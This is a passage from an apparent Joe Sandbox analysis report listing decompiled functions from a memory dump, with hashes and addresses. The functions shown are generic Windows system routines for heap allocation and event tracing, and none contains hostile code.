                                          • Instruction Fuzzy Hash: 01214F72600219FFD725CF99CC80EAEBBBDEF89750F154095EA4597210DA74AE41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010C0050 Relevance: .1, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E010C0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x119d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E010D9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E010EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01178A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E010D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x119b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                          0x010c0055
                                          0x010c005d
                                          0x010c0062
                                          0x010c006c
                                          0x010c006f
                                          0x010c0074
                                          0x010c007a
                                          0x010c007a
                                          0x010c0080
                                          0x010c0080
                                          0x010c0087
                                          0x010c008d
                                          0x010c008f
                                          0x010c0093
                                          0x010c0095
                                          0x010c009b
                                          0x010c00f8
                                          0x010c00fb
                                          0x010c00fc
                                          0x010c00ff
                                          0x010c0108
                                          0x010c0108
                                          0x010c00a2
                                          0x010c00a6
                                          0x010c00b3
                                          0x010c00bc
                                          0x010c00c5
                                          0x010c00ca
                                          0x0110c01e
                                          0x00000000
                                          0x00000000
                                          0x0110c02d
                                          0x010c00d5
                                          0x010c00d9
                                          0x0110c03d
                                          0x0110c046
                                          0x0110c046
                                          0x010c00df
                                          0x010c00e2
                                          0x010c00ea
                                          0x010c00ef
                                          0x010c00f2
                                          0x010c00f6
                                          0x010c0111
                                          0x010c0117
                                          0x010c0117
                                          0x00000000
                                          0x010c00f6
                                          0x010c00d0
                                          0x010c00d0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48b89a69bd544650103ebfebb8c4208d19916da4fbc2de96fcc642c9b93c9105
                                          • Instruction ID: 53199003df719cbc887f1431d6d8569afe0a9feffe6752a857a9a1963874d9b0
                                          • Opcode Fuzzy Hash: 48b89a69bd544650103ebfebb8c4208d19916da4fbc2de96fcc642c9b93c9105
                                          • Instruction Fuzzy Hash: 7331CE35201B04CFD726CB28C840B9AB3E5FF88714F2445ADF4A687694DB31A801CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01126C0A Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E01126C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E010C7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1197b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L010C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E010EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E010C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E010E9AE0();
						_t23 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                          0x01126c0a
                                          0x01126c0f
                                          0x01126c10
                                          0x01126c13
                                          0x01126c15
                                          0x01126c19
                                          0x01126c1c
                                          0x01126c21
                                          0x01126c28
                                          0x01126c3a
                                          0x01126c2a
                                          0x01126c33
                                          0x01126c33
                                          0x01126c3f
                                          0x01126c48
                                          0x01126c4d
                                          0x01126c60
                                          0x01126c65
                                          0x01126c69
                                          0x01126c73
                                          0x01126c79
                                          0x01126c7f
                                          0x01126c86
                                          0x01126c90
                                          0x01126c94
                                          0x01126ca6
                                          0x01126cb2
                                          0x01126cbd
                                          0x01126cbd
                                          0x01126cc3
                                          0x01126cc7
                                          0x01126ccb
                                          0x01126cd0
                                          0x01126cd1
                                          0x01126ce2
                                          0x01126ce2
                                          0x01126c69
                                          0x01126ced

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbbc6e51b8a82c976641877aff435feb4bfd54950ca7a4ec2833bd93c6dd56d2
                                          • Instruction ID: b72022f22e59e3903539cb773420d813f92d7b7ecc721121f27e215e8a8762b5
                                          • Opcode Fuzzy Hash: fbbc6e51b8a82c976641877aff435feb4bfd54950ca7a4ec2833bd93c6dd56d2
                                          • Instruction Fuzzy Hash: C421ABB1A00655AFD715EB68D880E6AB7B8FF48700F040069F945C7790D734ED60CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E90AF Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E010E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E010FD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E010DE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L010C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E010EF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E010DA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                          0x010e90af
                                          0x010e90b8
                                          0x010e90bb
                                          0x010e90bf
                                          0x010e90c2
                                          0x010e90c2
                                          0x010e90c8
                                          0x010e90cb
                                          0x010e90cd
                                          0x011214d7
                                          0x011214eb
                                          0x011214eb
                                          0x00000000
                                          0x011214eb
                                          0x011214db
                                          0x011214e6
                                          0x00000000
                                          0x011214f2
                                          0x011214e8
                                          0x00000000
                                          0x011214e8
                                          0x010e90d8
                                          0x010e90da
                                          0x010e90dd
                                          0x010e90e5
                                          0x00000000
                                          0x010e9139
                                          0x010e90fa
                                          0x010e90fe
                                          0x010e9142
                                          0x00000000
                                          0x010e9142
                                          0x010e9104
                                          0x010e9107
                                          0x010e910b
                                          0x010e9110
                                          0x010e9118
                                          0x010e9147
                                          0x010e9148
                                          0x010e914f
                                          0x010e9150
                                          0x010e9151
                                          0x010e9152
                                          0x010e9156
                                          0x010e915d
                                          0x010e9160
                                          0x010e9168
                                          0x010e916c
                                          0x010e91bc
                                          0x010e91be
                                          0x00000000
                                          0x010e91be
                                          0x010e916e
                                          0x010e9173
                                          0x010e9176
                                          0x00000000
                                          0x00000000
                                          0x010e917c
                                          0x010e9180
                                          0x010e91b5
                                          0x00000000
                                          0x010e91b5
                                          0x010e9182
                                          0x010e9185
                                          0x010e9189
                                          0x00000000
                                          0x00000000
                                          0x010e918e
                                          0x010e9190
                                          0x010e9198
                                          0x00000000
                                          0x00000000
                                          0x010e91a0
                                          0x00000000
                                          0x010e91ad
                                          0x010e91ad
                                          0x010e91b0
                                          0x010e91b1
                                          0x00000000
                                          0x010e9185
                                          0x010e911a
                                          0x010e911c
                                          0x010e911f
                                          0x010e9125
                                          0x010e9127
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: aaf2d79743dc34840e1bf89f577d28f277c72bb866c882fdcf036782d22e974d
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 16219571A00315EFDB21DF59C448E9AFBF8EB54754F1584AEE989A7200D330ED10CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D3B7A Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E010D3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x11984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x11984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x11984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E010EAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E010EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x11984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x11984c4; // 0x0
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                          0x010d3b89
                                          0x010d3b96
                                          0x010d3ba1
                                          0x010d3bab
                                          0x010d3bb5
                                          0x010d3bb9
                                          0x01116298
                                          0x010d3bbf
                                          0x010d3bc2
                                          0x010d3bc3
                                          0x010d3bc9
                                          0x010d3bca
                                          0x010d3bcc
                                          0x010d3bcd
                                          0x010d3bd4
                                          0x010d3bd6
                                          0x010d3bdb
                                          0x010d3bea
                                          0x010d3bf7
                                          0x010d3bfb
                                          0x010d3bff
                                          0x010d3c09
                                          0x010d3c0a
                                          0x010d3c0b
                                          0x010d3c0f
                                          0x010d3c14
                                          0x010d3c18
                                          0x010d3c18
                                          0x010d3bfb
                                          0x010d3c1b
                                          0x010d3c30
                                          0x010d3c30
                                          0x010d3c3d

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e79f80baf141045e6ca27d13572ee04f15cf5dabc5910524e57812819d103775
                                          • Instruction ID: 60fbe660561babb54506b15af526a24af334fb594ce501f5dd9e0002e3233be1
                                          • Opcode Fuzzy Hash: e79f80baf141045e6ca27d13572ee04f15cf5dabc5910524e57812819d103775
                                          • Instruction Fuzzy Hash: 71218EB2A00209EFC714DF98CD81B9ABBBDFF44648F190068EA08EB251D371AD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01126CF0 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E01126CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E010C7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E010C7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1085c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E010DF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E010DF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01127016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L010C2400( &_v52);
								}
								_t21 = L010C2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                          0x01126cfb
                                          0x01126d00
                                          0x01126d02
                                          0x01126d06
                                          0x01126d0a
                                          0x01126d0e
                                          0x01126d19
                                          0x01126d2b
                                          0x01126d1b
                                          0x01126d24
                                          0x01126d24
                                          0x01126d33
                                          0x01126d39
                                          0x01126d46
                                          0x01126d4f
                                          0x01126d61
                                          0x01126d51
                                          0x01126d5a
                                          0x01126d5a
                                          0x01126d69
                                          0x01126d6b
                                          0x01126d6d
                                          0x01126d6f
                                          0x01126d6f
                                          0x01126d74
                                          0x01126d79
                                          0x01126d7a
                                          0x01126d7f
                                          0x01126d82
                                          0x01126d88
                                          0x01126d89
                                          0x01126d90
                                          0x01126d94
                                          0x01126da7
                                          0x01126db1
                                          0x01126db1
                                          0x01126dbb
                                          0x01126dbb
                                          0x01126d90
                                          0x01126d69
                                          0x01126d46
                                          0x01126dc6

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6f99608731a356e316ca7252e798065e65acfcf15c970bbd1b4bd76d88c6f58
                                          • Instruction ID: e35710fcf21d97752e4312d610b0c15dd9748efb5f0efc288554efc2f600e8a4
                                          • Opcode Fuzzy Hash: d6f99608731a356e316ca7252e798065e65acfcf15c970bbd1b4bd76d88c6f58
                                          • Instruction Fuzzy Hash: F021C17250429D9BD315EF28C944BAFBBECAF91640F04055AFEC087291EB34D959CAA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0117070D Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0117070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E011707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0116AFDE( &_v8,  &_v12);
					E01171293(_t38, _v28, _t60);
					if(E010C7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E011614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                          0x0117071b
                                          0x01170724
                                          0x01170734
                                          0x01170738
                                          0x0117074b
                                          0x0117074b
                                          0x01170753
                                          0x01170753
                                          0x01170759
                                          0x0117075d
                                          0x01170774
                                          0x01170779
                                          0x0117077d
                                          0x01170789
                                          0x01170795
                                          0x011707a7
                                          0x01170797
                                          0x011707a0
                                          0x011707a0
                                          0x011707af
                                          0x011707c4
                                          0x011707cd
                                          0x011707cd
                                          0x011707af
                                          0x011707dc

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction ID: edda4a0e8bc239651501cd1089b45d70ba08230d802accc625cc5a1d2c4eb7b4
                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction Fuzzy Hash: D5213436204700AFD709DF1CC880B6ABBB5EFD5350F048569F9959B381C730D949CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01127794 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01127794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1197b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E010EF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E010C7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E010E9AE0();
					_t24 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                          0x01127799
                                          0x0112779a
                                          0x0112779b
                                          0x011277a3
                                          0x011277ab
                                          0x011277ae
                                          0x011277b1
                                          0x011277b1
                                          0x011277bf
                                          0x011277c4
                                          0x011277c8
                                          0x011277ce
                                          0x011277d4
                                          0x011277e0
                                          0x011277e0
                                          0x011277d6
                                          0x011277d6
                                          0x011277de
                                          0x00000000
                                          0x00000000
                                          0x011277de
                                          0x011277e5
                                          0x011277f0
                                          0x011277f3
                                          0x011277f6
                                          0x011277fd
                                          0x01127800
                                          0x0112780c
                                          0x01127818
                                          0x0112782b
                                          0x0112781a
                                          0x01127823
                                          0x01127823
                                          0x01127830
                                          0x01127831
                                          0x01127838
                                          0x0112783d
                                          0x0112783e
                                          0x0112784f
                                          0x0112784f
                                          0x0112785a

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9c40c4b7a69a50a2e8e9e2adbaad041d6a4717b43efca560a41ecc03c97a2e9
                                          • Instruction ID: f70f0059fc4797853f2299f655f422051d684594516b22021b89b6fb44a2dbec
                                          • Opcode Fuzzy Hash: a9c40c4b7a69a50a2e8e9e2adbaad041d6a4717b43efca560a41ecc03c97a2e9
                                          • Instruction Fuzzy Hash: E921DE72900614AFC729DF69D884EABBBB8EF58740F10056DFA0AC7790D734E900CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CAE73 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E010CAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E010C7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E010C7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E010C7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E010C7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01127794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                          0x010cae78
                                          0x010cae7c
                                          0x010cae7e
                                          0x010cae81
                                          0x010cae86
                                          0x010cae8d
                                          0x01112691
                                          0x010cae93
                                          0x010cae93
                                          0x010cae93
                                          0x010cae98
                                          0x010cae9d
                                          0x011126a2
                                          0x011126b4
                                          0x011126a4
                                          0x011126ad
                                          0x011126ad
                                          0x011126b9
                                          0x00000000
                                          0x011126bb
                                          0x00000000
                                          0x011126bb
                                          0x010caea3
                                          0x010caea3
                                          0x010caea3
                                          0x010caeaa
                                          0x011126c0
                                          0x011126c9
                                          0x011126c9
                                          0x010caeb3
                                          0x011126d4
                                          0x011126e1
                                          0x00000000
                                          0x00000000
                                          0x011126e7
                                          0x011126ee
                                          0x011126f0
                                          0x011126f9
                                          0x011126f9
                                          0x01112702
                                          0x01112708
                                          0x01112708
                                          0x0111270b
                                          0x0111270f
                                          0x01112711
                                          0x01112711
                                          0x01112725
                                          0x01112725
                                          0x00000000
                                          0x010caeb9
                                          0x010caeb9
                                          0x010caebf
                                          0x010caebf
                                          0x010caeb3

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction ID: 574fa63205e8a137cbac16d51dc45d09a4335dce8da2d2896e80d4e77f356fba
                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction Fuzzy Hash: C921F672701685DFE71A9B6CC944B6ABBE8EF44B40F2904B4DD448B796E734DC40CEA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DFD9B Relevance: .1, Instructions: 69COMMON
